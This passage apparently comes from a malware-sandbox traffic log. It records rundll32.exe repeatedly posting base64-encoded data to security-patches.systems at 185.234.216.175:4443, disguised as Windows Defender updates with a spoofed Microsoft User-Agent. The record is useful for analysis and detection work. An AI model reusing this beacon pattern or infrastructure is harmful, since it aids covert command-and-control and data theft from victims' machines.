data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:47.275989056 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49816	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:47.545623064 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:49.003232956 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:48 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49817	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:49.257334948 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:50.724167109 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:50 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49818	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:50.991919041 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:52.439371109 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:52 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49819	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:52.711251974 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:54.170114994 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:53 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49820	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:54.426835060 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:55.877197027 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:55 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49821	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:56.129458904 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:57.580692053 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:57 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.5	49822	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:57.835892916 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:59.294399977 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:58 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.5	49823	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:59.554130077 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:00.998343945 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:00 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	49824	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:01.273061991 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:02.758141041 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:02 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	49825	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:03.080204964 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:04.500267029 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:04 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49826	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:04.756861925 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:13:06.207870960 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:13:05 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	49827	185.234.216.175	4443	7096	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:13:06.476110935 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 